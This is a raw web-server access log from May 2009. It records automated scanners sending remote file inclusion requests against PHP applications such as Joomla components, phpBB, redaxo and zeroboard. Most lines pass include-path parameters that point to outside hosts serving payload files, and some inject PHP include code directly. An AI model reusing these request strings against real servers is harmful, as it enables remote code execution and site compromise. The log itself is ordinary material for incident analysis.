118.127.17.214 - - [31/May/2009:09:04:47 -0400] "GET /logs/access_log.Q109052100/http://lol.vc/testor.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
218.146.231.193 - - [31/May/2009:09:05:05 -0400] "GET /logs/error_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
221.139.104.104 - - [31/May/2009:09:05:38 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:09:05:38 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:09:05:38 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.160.22.21 - - [31/May/2009:09:05:42 -0400] "GET //errors.php?error=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
217.160.22.21 - - [31/May/2009:09:05:42 -0400] "GET /logs//errors.php?error=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
221.139.104.104 - - [31/May/2009:09:05:55 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.18.233.198 - - [31/May/2009:09:06:01 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:09:06:02 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:09:06:03 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
62.146.68.61 - - [31/May/2009:09:06:14 -0400] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.146.68.61 - - [31/May/2009:09:06:14 -0400] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.0.141.241 - - [31/May/2009:09:06:32 -0400] "GET /logs/access_log.Q109052200%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:09:07:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.203.180.144 - - [31/May/2009:09:07:57 -0400] "GET /logs/access_log.Q108072800%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:09:08:09 -0400] "GET /logs/access_log.Q108072800%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
121.165.73.157 - - [31/May/2009:09:08:41 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:09:08:41 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:09:08:41 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:09:08:42 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:09:08:42 -0400] "GET /logs/access_log.Q109052300//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:09:08:46 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.17 - - [31/May/2009:09:08:46 -0400] "GET /logs/access_log.Q109052300/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
121.165.73.157 - - [31/May/2009:09:08:46 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.221.130.17 - - [31/May/2009:09:08:46 -0400] "GET /SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 205 "-" "libwww-perl/5.805"
121.165.73.157 - - [31/May/2009:09:08:46 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.221.130.17 - - [31/May/2009:09:08:46 -0400] "GET /logs/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
77.221.130.17 - - [31/May/2009:09:08:48 -0400] "GET /SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 205 "-" "libwww-perl/5.805"
77.221.130.17 - - [31/May/2009:09:08:48 -0400] "GET /logs/access_log.Q109052300/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
77.221.130.17 - - [31/May/2009:09:08:48 -0400] "GET /logs/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
85.214.83.196 - - [31/May/2009:09:09:07 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:07 -0400] "GET /logs/error_log.Q109050500%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:07 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:19 -0400] "GET /logs/access_log.Q109051000%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:22 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:22 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:22 -0400] "GET /logs/error_log.Q109050500%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:28 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:28 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:28 -0400] "GET /logs/error_log.Q109050500%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:33 -0400] "GET /logs/access_log.Q109051000%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:09:09:33 -0400] "GET //?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:09:09:33 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:09:09:33 -0400] "GET /logs//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:09:40 -0400] "GET /logs/access_log.Q109051000%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:09:10:10 -0400] "GET /logs/access_log.Q109050700//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:09:10:16 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:09:10:17 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:09:10:17 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:09:10:22 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:09:10:26 -0400] "GET /logs/access_log.Q109052300//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:10:58 -0400] "GET /logs/access_log.Q109010700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:11:01 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:11:01 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.17 - - [31/May/2009:09:11:02 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
77.221.130.17 - - [31/May/2009:09:11:02 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
77.221.130.17 - - [31/May/2009:09:11:02 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
217.147.29.190 - - [31/May/2009:09:11:07 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:11:07 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:11:07 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
212.97.132.101 - - [31/May/2009:09:11:23 -0400] "GET /logs/error_log.Q108090500/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 231 "-" "libwww-perl/5.53"
212.97.132.101 - - [31/May/2009:09:11:23 -0400] "GET /logs/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 210 "-" "libwww-perl/5.53"
212.97.132.101 - - [31/May/2009:09:11:23 -0400] "GET /SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 205 "-" "libwww-perl/5.53"
112.175.141.41 - - [31/May/2009:09:11:27 -0400] "GET /logs/access_log.Q109031800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
212.97.132.101 - - [31/May/2009:09:11:28 -0400] "GET /logs/error_log.Q108052500/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 231 "-" "libwww-perl/5.53"
112.175.141.41 - - [31/May/2009:09:11:32 -0400] "GET /logs/access_log.Q108081500%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:09:12:02 -0400] "GET /logs/access_log.Q109052300//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:09:12:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.17 - - [31/May/2009:09:12:32 -0400] "GET /logs/error_log.Q108090500/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
217.147.29.190 - - [31/May/2009:09:12:57 -0400] "GET /logs/access_log.Q109010700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:12:57 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:12:57 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.130.17 - - [31/May/2009:09:13:15 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
77.221.130.17 - - [31/May/2009:09:13:15 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
77.221.130.17 - - [31/May/2009:09:13:15 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
207.44.232.81 - - [31/May/2009:09:13:19 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:13:23 -0400] "GET /logs/error_log.Q109050500/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.221.130.17 - - [31/May/2009:09:13:23 -0400] "GET /logs/error_log.Q108090500/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.214.83.196 - - [31/May/2009:09:13:24 -0400] "GET /logs/access_log.Q109051000/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
77.221.130.17 - - [31/May/2009:09:13:24 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
85.214.83.196 - - [31/May/2009:09:13:25 -0400] "GET /logs/error_log.Q109050500/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:13:26 -0400] "GET /logs/error_log.Q109050500/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:13:26 -0400] "GET /logs/access_log.Q109051000/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:09:13:27 -0400] "GET /logs/access_log.Q109051000/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:09:13:37 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:09:13:37 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:09:13:40 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:09:13:59 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:09:14:10 -0400] "GET /logs/access_log.Q109052300//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:15:08 -0400] "GET //?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:15:08 -0400] "GET /logs/access_log.Q109052200//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:15:08 -0400] "GET /logs//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:15:23 -0400] "GET //?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:15:23 -0400] "GET /logs/access_log.Q109052200//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:15:23 -0400] "GET /logs//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:09:15:23 -0400] "GET /logs/access_log.Q109051800%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.221.130.17 - - [31/May/2009:09:15:41 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
217.147.29.190 - - [31/May/2009:09:15:44 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:15:57 -0400] "GET /logs/access_log.Q109052300//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:09:16:11 -0400] "GET /logs/access_log.Q109050700//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:16:14 -0400] "GET /logs/access_log.Q109052300//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:17:05 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:09:17:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [31/May/2009:09:17:12 -0400] "GET /logs/access_log.Q108112300//skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
62.146.68.61 - - [31/May/2009:09:18:47 -0400] "GET /logs/access_log.Q109052300//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:18:47 -0400] "GET /logs/access_log.Q109050900//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:18:47 -0400] "GET /logs//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:18:47 -0400] "GET //?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:19:42 -0400] "GET /logs/access_log.Q109051800%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:19:50 -0400] "GET //?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:19:50 -0400] "GET /logs//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:19:50 -0400] "GET /logs/access_log.Q109052300//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:19:50 -0400] "GET /logs/access_log.Q109050900//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:19:51 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:19:51 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:19:51 -0400] "GET //skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.249.67.16 - - [31/May/2009:09:19:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L200C18446DF10300A6DD058+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.125.100 - - [31/May/2009:09:19:55 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:19:55 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:19:55 -0400] "GET //skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:09:19:56 -0400] "GET /logs/access_log.Q109051800%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
79.18.233.198 - - [31/May/2009:09:20:33 -0400] "GET /logs/error_log.Q108120400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:09:20:35 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
